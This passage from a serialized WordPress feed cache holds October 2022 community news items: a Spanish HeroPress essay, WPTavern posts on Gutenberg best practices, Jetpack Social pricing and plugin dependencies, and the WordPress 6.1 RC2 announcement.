fue algo increible, fue un trabajo arduo, muy gratificante, fue un exito, nunca antes me habia sentido tan bien en mi lo profesional, habia pasado años, sin compartir con nadie algo que tanto me gusta, de repente teniamos una comunidad, nos reunimos habitualmente, y compartimos sobre lo que mas nos apasiona.</p>\n\n\n\n<p>Recientemente mis charlas giran en dar a conocer a mi comunidad local las nuevas tendencias de WordPress, colaboro como administrador del grupo de WordPress Costa Rica.</p>\n\n\n\n<h2 class=\"kt-adv-heading_d6d109-dc wp-block-kadence-advancedheading\"><strong>Fuera de Costa Rica</strong></h2>\n\n\n\n<p>El segundo año que asistí al WordCamp Miami, participe como voluntario, y tuve la oportunida de poder interactuar con muchos de los humanos que sigo en redes sociales, y así luego me anime a enviar charlas y participar en los WordCamps que se realizan en mi region, con muchas ganas de compartir lo que he aprendido, al día de hoy he participado como voluntario, charlista, y organizador en mi ciudad Costa Rica, Nicaragua, México y en el primer WordCamp Centroamericano el cual se realizó en línea.</p>\n\n\n\n<p>Luego vinieron las charlas en otro idioma, He tenido la oportunidad de dar charlas en Roma, Italia, participe como voluntario en el WordCamp US, donde tuve la oportunidad de conocer a colegas y al CEO de una empresa que admiro mucho, esto fue en Nashville, USA.</p>\n\n\n\n<p>volver a ver a colegas con los que he hoy tenido el privilegio de trabajar, mi circulo de amigos se expandio.</p>\n\n\n\n<p>Tambien tenido la oportunidad de participar en conferencias en línea, como en el GatsbyConf, JavaScript For WordPress y en el WordCamp EU 2021.</p>\n\n\n\n<p>Me gusta compartir y dar charlas sobre el JAMStack, especialmente con GatsbyJS y WordPress como un headless CMS.</p>\n\n\n\n<h2 class=\"kt-adv-heading_1df56f-ba wp-block-kadence-advancedheading\"><strong>Professional Path</strong></h2>\n\n\n\n<p>Tengo mucho que agradecer a WordPress, lo primero que trajo fue la curiosidad de aprender programación, luego el trabajo remoto. Al tiempo empecé a trabajar para una agencia localizada en Austin, Texas, con varios colaboradores en Costa Rica, corria el año 2017, me contrataron por mis conocimientos en WordPress, era no solo la primera vez que podía trabajar completamente dedicado a WP, si no tambien desde mi casa, nunca mas volví a pisar una oficina, ver a mis hijos crecer y sobre todo trabajar en chancletas.</p>\n\n\n\n<p>Ese mismo año, junto a mi esposa, fúndanos una pequeña agencia especializada en WordPress, la cual aún tenemos y es manejada por ella. Nuestro más reciente trabajo, fue la página de los <a href=\"https://premiosacam.com/\">Premios de la Música Costarricense</a>.</p>\n\n\n\n<h2 class=\"kt-adv-heading_a5a1dc-37 wp-block-kadence-advancedheading\"><strong>Overseas</strong></h2>\n\n\n\n<p>Decidi prestar atención a los Job Board que encuentras cuando vas a un WordCamp, buscaba la oportunidad de trabajar en proyectos más grandes, proyectos corporativos donde podría expander mis conocimientos, empecé a aplicar, estaba convencido que tenia el nivel para trabajar en una agencia dedicada 100% a WordPress.</p>\n\n\n\n<p>Trabaje para agencias en New York y DC, y la oportunidad llego y con perseverancia y esfuerzo el dia de hoy trabajo como Senior Frontend Engineer, en la agencia que más admiro, WebDevStudios, dedicado 100% a WordPress.</p>\n\n\n\n<p>WordPress definitivamente cambio mi vida en lo personal y en lo profesional, he conocido lugares y gente increible, he podido sobre todo darle tiempo y una vida de calidad a mi familia, he aprendido mucho, y aun sigo aprendiendo, escribo sobre WordPress, ayudo a mi comunidad ensenando sobre las herramientas con las cuales pueden llevar a cabo sus ideas.</p>\n\n\n\n<p>y sobre todo estoy haciendo lo que mas me apaciona y es hacer del mundo un lugar mejor una linea de codigo a la vez.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/making-the-world-a-better-place-one-line-of-code-at-a-time/\">Making The World A Better Place One Line Of Code At A Time</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Oct 2022 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Alfredo Navas\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Do The Woo Community: Don’t Put Technical Support in the Wrong Box\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73116\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://dothewoo.io/dont-put-technical-support-in-the-wrong-box/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:398:\"<p>Your technical support team is an extension of the customer service department and of the sales department.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/dont-put-technical-support-in-the-wrong-box/\">Don&#8217;t Put Technical Support in the Wrong Box</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Oct 2022 09:51:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"WPTavern: 10up Publishes Gutenberg Best Practices Website\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138755\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wptavern.com/10up-publishes-gutenberg-best-practices-website\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2819:\"<p>10up has published a <a href=\"https://gutenberg.10up.com/\">Gutenberg Best Practices</a> website as a public resource with tutorials, documentation, and example code. Maintaining current documentation has not been a strong point of the official Gutenberg project as the pace of the project makes it difficult for contributors and extenders to keep up.</p>\n\n\n\n<p>&#8220;Gutenberg introduced an entirely new editorial paradigm for content creation and page building within WordPress,&#8221; 10up Associate Director of Editorial Engineering Fabian Kaegy said. &#8220;Because the block editor is still fairly new, it is advancing quickly and changes are introduced regularly; as such, learning opportunities are scarce and we have felt an absence of best practice documentation that meets 10up standards for craftsmanship.&#8221;</p>\n\n\n\n<p>10up&#8217;s Gutenberg Best Practices were written to supplement WordPress&#8217; core documentation with what Kaegy said is a &#8220;more client-services-centric approach tailored to engineering enterprise-level editorial experiences.&#8221;</p>\n\n\n\n<p>For developers who are brand new to working with the block editor, the <a href=\"https://gutenberg.10up.com/reference/\">Reference</a> section has a wealth of information about the anatomy of a block, the fundamentals of block theming with theme.json, block extensions, block variations, and more, with supporting videos and gifs. The documentation also gives a little more context for practical usage. For example, the section about <a href=\"https://gutenberg.10up.com/reference/Blocks/block-transforms\">Block Transforms</a> includes information about when and how to define block transforms.</p>\n\n\n\n<p>The Training section of 10up&#8217;s Gutenberg Best Practices contains a mini crash course on the file structure of a block and all of its components, and how to build a custom block using the <a href=\"https://github.com/10up/wp-scaffold/tree/trunk/themes/10up-theme/includes/blocks/example-block\">10up Starter Block</a>. This is especially helpful for developers looking for some extra guidance developing their first blocks.</p>\n\n\n\n<p>The <a href=\"https://gutenberg.10up.com/guides/\">Guides</a> section contains more advanced topics like extending core blocks and including frontend JS with a block. The documentation is <a href=\"https://github.com/10up/gutenberg-best-practices\">available on GitHub</a> for anyone to contribute edits. The site also links to a <a href=\"https://github.com/10up/gutenberg-best-practices/discussions\">discussion board on GitHub</a> where developers are welcome to join discussions and workshop the best practices in collaboration with 10up employees. 10up has published the Gutenberg Best Practices website with a beta designation and intends to update and expand it as WordPress evolves.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Oct 2022 21:46:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WordPress.org blog: WordPress 6.1 Release Candidate 2 (RC2) Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-2-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6806:\"<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>The second release candidate (RC2) for WordPress 6.1 is now available!</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>“Release Candidate” means that this version of WordPress is ready for release and it is a key milestone in the 6.1 release cycle! Before the official release date, the community sets aside time to perform final reviews and help test. Since the WordPress ecosystem includes thousands of plugins and themes, it is important that everyone checks to see if anything has been missed along the way. That means the project would <em>greatly benefit from</em> your assistance.</p>\n\n\n\n<p>WordPress 6.1 is planned for official release on November 1st, 2022, two weeks from today.&nbsp;</p>\n\n\n\n<p><strong>This version of the WordPress software is under development</strong>. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC2 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.1 RC2 in three ways:</p>\n\n\n\n<p><strong>Option 1: </strong>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2: </strong>Direct download the <a href=\"https://wordpress.org/wordpress-6.1-RC2.zip\">RC2 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3:</strong> Use the WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.1-RC2</code></p>\n\n\n\n<p>Additional information on the <a href=\"https://make.wordpress.org/core/6-1/\">6.1 release cycle is available here</a>.</p>\n\n\n\n<p>Check the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\">6.1-related developer notes</a> in the coming weeks detailing all upcoming changes.</p>\n\n\n\n<h2><strong>What’s in WordPress 6.1 RC2?</strong></h2>\n\n\n\n<p>Since Release Candidate 1, approximately 65 items have been addressed, bringing the total count to more than 2,000 updates since WordPress 6.0 in May of 2022.&nbsp;</p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.1\">GitHub tickets</a></li>\n\n\n\n<li><a href=\"https://core.trac.wordpress.org/query?status=accepted&status=closed&changetime=10%2F11%2F2022..10%2F18%2F2022&resolution=fixed&milestone=6.1&col=id&col=summary&col=status&col=milestone&col=owner&col=type&col=priority&order=id\">Trac tickets</a>&nbsp;</li>\n</ul>\n\n\n\n<p>WordPress 6.1 is the third major release for 2022, following 5.9 and 6.0, released in January and May of this year, respectively.</p>\n\n\n\n<p>To learn more about the highlights for both end-users and developers, you’re invited to read more about them in the <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">RC1 announcement post</a> and review the <a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">WordPress 6.1 Field Guide</a>.</p>\n\n\n\n<h2><strong>Plugin and theme developers</strong></h2>\n\n\n\n<p>All plugin and theme developers should test their respective extensions against WordPress 6.1 RC2 and update the “<em>Tested up to”</em> version in their readme file to 6.1. If you find compatibility problems, please post detailed information to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>, so these items can be investigated further prior to the final release date of November 1st.</p>\n\n\n\n<h2><strong>Translate WordPress</strong></h2>\n\n\n\n<p>Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev\">Help translate WordPress into more than 100 languages.</a>&nbsp;</p>\n\n\n\n<p><strong>Keep WordPress bug-free – help with testing</strong></p>\n\n\n\n<p>Testing for issues is critical for stabilizing a release throughout its development. Testing is also a great way to contribute. <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">This detailed guide</a> is an excellent start if you have never tested a beta release.</p>\n\n\n\n<p>Testing helps ensure that this and future releases of WordPress are as stable and issue-free as possible. Anyone can take part in testing – regardless of prior experience.</p>\n\n\n\n<p>Want to know more about testing releases like this one? Read about the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join a <a href=\"https://wordpress.slack.com/messages/core-test/\">core-test channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. This is also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>To review features in the Gutenberg releases since WordPress 6.0 (the most recent major release of WordPress), access the <em>What’s New In Gutenberg</em> posts for <a href=\"https://wp.me/p2AvED-pYR\">14.3</a>, <a href=\"https://wp.me/p2AvED-pMn\">14.2</a>, <a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\">14.1</a>, <a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\">14.0</a>, <a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\">13.9</a>, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\">13.8</a>, <a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\">13.7</a>, <a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\">13.6</a>, <a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\">13.5</a>, <a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\">13.4</a>, <a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">13.3</a>, <a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">13.2</a>, and <a href=\"https://make.wordpress.org/core/2022/04/28/whats-new-in-gutenberg-13-1-27-april/\">13.1</a>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2><strong>Haiku Fun for RC2</strong></h2>\n\n\n\n<p><em>Two weeks from the launch&nbsp;</em></p>\n\n\n\n<p><em>Constant improvements we make&nbsp;</em></p>\n\n\n\n<p><em>Great outcomes await&nbsp;</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Oct 2022 19:31:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Jonathan Pantani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Jetpack Social Plugin Adds Paid Plan, Free Users Now Limited to 30 Shares per Month\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138706\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"https://wptavern.com/jetpack-social-plugin-adds-paid-plan-free-users-now-limited-to-30-shares-per-month\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2551:\"<p>Jetpack has announced changes to its <a href=\"https://wordpress.org/plugins/jetpack-social/\">Jetpack Social</a> plugin that may impact publishers who frequently share across social media networks. Previously, users could share an unlimited number of posts automatically via their connected social media accounts. Jetpack is shuffling its monetization strategy for this extension and has capped social sharing at 30 shares per month for the free tier.</p>\n\n\n\n<p>A <a href=\"https://jetpack.com/social/\">new paid plan</a> offers 1,000 shares and re-shares per month, starting at $1/month for the first month and is $10/month thereafter. As a concession, Jetpack is rolling the social previews and re-sharing into the free plan.</p>\n\n\n\n<img />\n\n\n\n<p>With Jetpack Social, if a post is automatically shared to Twitter, Facebook, and LinkedIn, that counts as three shares. It&#8217;s easy to see how quickly these shares can rack up to where even a casual blogger might require a paid plan. Publishers that are used to being able to automatically share all their posts for free should be aware this change that limits them to to 30 shares per month.</p>\n\n\n\n<p>I would not be surprised to see some users switch to another social sharing plugin, as many others offer far more social networks and don&#8217;t limit the number of times users can share. Instead they opt to restrict re-sharing, scheduling, or the ability to connect multiple accounts per social network. </p>\n\n\n\n<p>Jetpack Social has a new team behind it focused on making the product better. In 2021, Automattic <a href=\"https://wptavern.com/automattic-acquires-social-image-generator-plugin-plans-to-integrate-with-jetpack\">acquired the Social Image Generator plugin</a> with plans to integrate it into Jetpack&#8217;s social media tools. This may make the product more compelling, since it currently doesn&#8217;t stand up well to the myriad of free sharing plugins out there. Jetpack only supports four social networks, but the team is working on expanding the plugin&#8217;s capabilities. The plugin&#8217;s development team also <a href=\"https://github.com/Automattic/jetpack/issues/new?assignees=&labels=%5BType%5D+Feature&template=feature-request.yml&title=Feature+Request%3A\">accepts feature suggestions</a> on its GitHub repository.</p>\n\n\n\n<p>Version 1.4.0 of the Jetpack Social plugin moved the share limits code to the Publicize package and added a meter to show users how many shares they have remaining. Users on the free plan should notice these changes in their dashboards.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Oct 2022 14:54:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"Do The Woo Community: A WooSesh Chat with Paul Maiorana, Kimberly Coleman and Courtney Robertson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73148\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://dothewoo.io/woosesh-chat-paul-maiorana-kimberly-coleman-courtney-robertson/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:454:\"<p>In this show we talk about the new turnkey WooCommerce, flash sales year round and a look at the first day of sessions. </p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/woosesh-chat-paul-maiorana-kimberly-coleman-courtney-robertson/\">A WooSesh Chat with Paul Maiorana, Kimberly Coleman and Courtney Robertson</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Oct 2022 10:15:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Plugin Dependencies Feature Plugin Now Ready for Testing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138684\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wptavern.com/plugin-dependencies-feature-plugin-now-ready-for-testing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3427:\"<p>For more than a decade, WordPress developers have been <a href=\"https://wptavern.com/yet-another-plugin-dependencies-discussion-two-proposals-this-time\">discussing</a> how core can support plugins that require one or more other plugins in order to work. Having a standardized way of managing plugin dependencies would be a useful and time-saving feature for developers, who currently have to roll their own solutions for this. </p>\n\n\n\n<p>&#8220;The situation there is a lot like the relationship between parent and child themes,&#8221; project lead Andy Fragen said in February when <a href=\"https://make.wordpress.org/core/2022/02/24/feature-project-plugin-dependencies/\">introducing the idea for the feature plugin</a>. &#8220;Without their relationships to the bigger plugin, those dependent plugins can do very little. Every plugin developer is on their own to code a solution to resolve the issue. The single most common example is WooCommerce, which is a dependency for hundreds, if not thousands, of WooCommerce add-on plugins.&#8221;</p>\n\n\n\n<p>After nine months of discussion and development, the <a href=\"https://wordpress.org/plugins/wp-plugin-dependencies/\">Plugin Dependencies feature plugin</a> is now <a href=\"https://make.wordpress.org/core/2022/10/12/call-for-testing-plugin-dependencies/\">ready for testing</a>. It allows plugin authors to specify any WordPress.org-hosted plugin(s) that are required for their plugins to function. A plugin that has dependencies can be identified by adding a “Requires Plugins” header to the docblock of the main plugin file. Plugin authors can specify as many dependencies as necessary in a comma-separated list of plugin slugs.</p>\n\n\n\n<p>How does it work? Site owners will get an admin notice if there are dependencies they need to install. The plugin card will be updated to display the <em>Requires</em>&nbsp;and&nbsp;<em>Required by</em>&nbsp;information on the Plugins screen.</p>\n\n\n\n<img />\n\n\n\n<p>Fragen <a href=\"https://make.wordpress.org/core/2022/10/12/call-for-testing-plugin-dependencies/\">outlined</a> how the community can test the new core support for handling plugin dependencies. You do not have to be a developer to participate in testing this new feature. It involves installing test plugin files and confirming admin notices appear and disappear at the right times. Testers who are comfortable editing plugin files can try adding dependencies, adding a dependency for non-WordPress.org plugins, and other more advanced tests.</p>\n\n\n\n<p>Version control is not part of this project, so developers will not be able to specify a minimum required version, for example. </p>\n\n\n\n<p>&#8220;Version control&nbsp;is out of scope for the feature as described in the original Make post referenced above,&#8221; Fragen said in response to a question on the feature plugin. &#8220;As the majority of the dependencies come from the dot org repository, the most current versions will be installed.</p>\n\n\n\n<p>&#8220;Specifically, WordPress should automatically prompt the user to update to the current version and may use auto-updates as well.&#8221;</p>\n\n\n\n<p>Testing will be open until December 1, 2022. Anyone who wants to be part of moving this long-awaited feature towards a possible inclusion in core can <a href=\"https://github.com/WordPress/wp-plugin-dependencies/issues/new\">report issues</a> to the WP Plugin Dependencies plugin&#8217;s repository.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Oct 2022 02:53:05 